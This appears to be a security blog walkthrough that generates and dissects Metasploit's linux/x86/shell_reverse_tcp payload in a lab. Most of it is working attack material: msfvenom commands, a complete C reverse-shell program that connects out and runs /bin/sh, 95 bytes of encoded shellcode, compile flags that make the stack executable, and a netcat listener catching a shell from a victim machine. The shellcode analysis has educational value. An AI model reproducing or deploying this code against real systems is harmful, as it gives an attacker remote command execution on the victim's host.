Analyzing linux/x86/shell_reverse_tcp
I will analyze this shellcode from msfvenom, and I will keep it simple.
0x4553@kali:~# msfvenom -l payloads | grep linux/x86
...
linux/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
...
Keep in mind that shellcode does its work through system calls. On 32-bit Linux a system call is made with the software interrupt instruction int 0x80, and the calling skeleton looks like this:
EAX <-- system call number [the return value comes back in EAX]
EBX <-- 1st arg
ECX <-- 2nd arg
EDX <-- 3rd arg
int 0x80 <-- trap into the kernel
linux/x86/shell_reverse_tcp
Description: Connect back to the attacker and spawn a command shell.
To show the shellcode’s options:
0x4553@kali:~# msfvenom -p linux/x86/shell_reverse_tcp --list-options
Options for payload/linux/x86/shell_reverse_tcp:
=========================
...
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CMD /bin/sh yes The command string to execute
LHOST yes The listen address
LPORT 4444 yes The listen port
...
The shellcode connects back to LHOST on LPORT and then executes CMD with its standard input, output and error attached to that connection, so the attacker's listener drives the shell.
Let's create the shellcode, specifying only LHOST and leaving the other options at their defaults:
0x4553@kali:~# msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.149.142 -f raw > reverse_tcp_raw
-p: the payload to use.
LHOST: the address the shellcode connects back to.
-f: the output format; raw is chosen here so the bytes can be disassembled first.
Let's statically analyze the shellcode using ndisasm:
0x4553@kali:~# cat reverse_tcp_raw| ndisasm -u -
-u: Specifies 32-bit mode.
Analyzing the instructions
TL;DR
This shellcode makes four system calls, in this order:
- socketcall: creates the TCP socket with the socket subcall.
- dup2: called three times to redirect the victim's stdin, stdout and stderr onto that socket, so the attacker's input reaches the shell and the shell's output reaches the attacker.
- socketcall: connects to LHOST at LPORT with the connect subcall.
- execve: executes the program specified by CMD.
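To make the register convention and the four calls concrete, here is the same sequence written in C. This is an added example, not the article's code or Metasploit's: each call is annotated with the registers the shellcode loads for the equivalent int 0x80, and a helper shows the two `push dword` instructions that put the sockaddr_in (LHOST and LPORT) on the stack. The LHOST/LPORT values are the article's; the function names encode_sockaddr_pushes, sockaddr_push_byte, sockaddr_push_nulls and reverse_shell are mine.

```c
/* Added example (not the article's code): the payload's four system calls
 * in C, annotated with the registers the shellcode sets for each int 0x80,
 * plus the two `push dword` instructions that build the sockaddr_in. */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* The shellcode builds the sockaddr_in with two pushes (reversed, because the
 * stack grows down):
 *   push dword <sin_addr>            -> 68 c0 a8 95 8e  (192.168.149.142)
 *   push dword <sin_port:sin_family> -> 68 02 00 11 5c  (AF_INET=2, 4444=0x115c)
 * Writes those 10 instruction bytes to out and returns how many of them are
 * null bytes, or -1 if ip is not a dotted quad. */
int encode_sockaddr_pushes(const char *ip, uint16_t port, unsigned char out[10]) {
    struct in_addr a;
    if (inet_pton(AF_INET, ip, &a) != 1) return -1;
    out[0] = 0x68;
    memcpy(out + 1, &a.s_addr, 4);          /* s_addr is already network order */
    out[5] = 0x68;
    out[6] = AF_INET & 0xff;                /* 0x0002 stored little-endian: 02 00 */
    out[7] = AF_INET >> 8;                  /* this zero is the raw payload's null */
    out[8] = (unsigned char)(port >> 8);    /* sin_port in network order: 11 5c */
    out[9] = (unsigned char)(port & 0xff);
    int nulls = 0;
    for (int i = 0; i < 10; i++) if (out[i] == 0) nulls++;
    return nulls;
}

/* Byte i (0..9) of the encoded pushes for ip:port, or -1 on bad input. */
int sockaddr_push_byte(const char *ip, uint16_t port, int i) {
    unsigned char out[10];
    if (i < 0 || i > 9 || encode_sockaddr_pushes(ip, port, out) < 0) return -1;
    return out[i];
}

/* Number of null bytes the two pushes would carry for ip:port, or -1. */
int sockaddr_push_nulls(const char *ip, uint16_t port) {
    unsigned char out[10];
    return encode_sockaddr_pushes(ip, port, out);
}

/* The four calls in the order the shellcode makes them. Returns -1 on
 * failure; on success execve replaces the process and nothing returns. */
int reverse_shell(const char *ip, uint16_t port, const char *cmd) {
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    if (inet_pton(AF_INET, ip, &sa.sin_addr) != 1) return -1;

    /* 1. socketcall(SYS_SOCKET, {AF_INET, SOCK_STREAM, 0})
     *    eax=0x66  ebx=1  ecx=&{2,1,0} */
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0) return -1;

    /* 2. dup2(fd, 2); dup2(fd, 1); dup2(fd, 0)
     *    eax=0x3f  ebx=fd  ecx=2,1,0  (the shellcode loops with dec ecx; jns) */
    for (int i = 2; i >= 0; i--)
        if (dup2(fd, i) < 0) return -1;

    /* 3. socketcall(SYS_CONNECT, {fd, &sa, 16})
     *    eax=0x66  ebx=3  ecx=&{fd,&sa,16} */
    if (connect(fd, (struct sockaddr *)&sa, sizeof sa) != 0) return -1;

    /* 4. execve(cmd, {cmd, NULL}, NULL)
     *    eax=0x0b  ebx=cmd  ecx=argv  edx=NULL */
    char *argv[] = { (char *)cmd, NULL };
    execve(cmd, argv, NULL);
    return -1;  /* only reached if execve failed */
}

int main(int argc, char **argv) {
    unsigned char push[10];
    int nulls = encode_sockaddr_pushes("192.168.149.142", 4444, push);
    printf("push instructions for 192.168.149.142:4444:");
    for (int i = 0; i < 10; i++) printf(" %02x", push[i]);
    printf("  (%d null byte)\n", nulls);
    /* `./a.out LHOST LPORT` really connects back; start nc -nlvp LPORT first. */
    if (argc == 3)
        return reverse_shell(argv[1], (uint16_t)atoi(argv[2]), "/bin/sh");
    return 0;
}
```

The libc wrappers hide the socketcall multiplexing that the shellcode does by hand (EBX selects the subcall, ECX points at the argument array), but the order and the arguments are identical. Note that dup2 runs before connect, exactly as in the shellcode, so once the call is made the process's own stdio already belongs to the socket.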
The raw payload contains a null byte (the high byte of the AF_INET family word that is pushed as part of the sockaddr_in), which would cut it short if it were delivered through a string-copy routine, so let's generate an encoded version without null bytes:
0x4553@kali:~# msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.149.142 -b "\x00" -f c -v shellcode
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of c file: 431 bytes
unsigned char shellcode[] =
"\xd9\xe8\xb8\x5f\x92\xed\x97\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x12\x83\xc6\x04\x31\x46\x13\x03\x19\x81\x0f\x62\x94\x7e\x38"
"\x6e\x85\xc3\x94\x1b\x2b\x4d\xfb\x6c\x4d\x80\x7c\x1f\xc8\xaa"
"\x42\xed\x6a\x83\xc5\x14\x02\xd4\x9e\x72\x5c\xbc\xdc\x7c\x71"
"\x61\x68\x9d\xc1\xff\x3a\x0f\x72\xb3\xb8\x26\x95\x7e\x3e\x6a"
"\x3d\xef\x10\xf8\xd5\x87\x41\xd1\x47\x31\x17\xce\xd5\x92\xae"
"\xf0\x69\x1f\x7c\x72";
And place it in shellcode.c:
Open a listener on the attacker machine:
0x4553@kali:~# nc -nlvp 4444
listening on [any] 4444 ...
Compile and run on the victim. The payload is 32-bit code, so on a 64-bit victim add -m32 (which needs gcc-multilib); -z execstack makes the process memory executable (the kernel applies read-implies-exec to a 32-bit program with an executable stack), which is what lets the shellcode in the global array run and lets the decoder stub rewrite it in place:
elham@ubuntu:~$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
elham@ubuntu:~$ ./shellcode
Shellcode Length: 95
We got a reverse shell from the victim on the attacker's listener:
0x4553@kali:~# nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.149.142] from (UNKNOWN) [192.168.149.140] 53858
whoami
elham
I hope you will find this article useful ❤.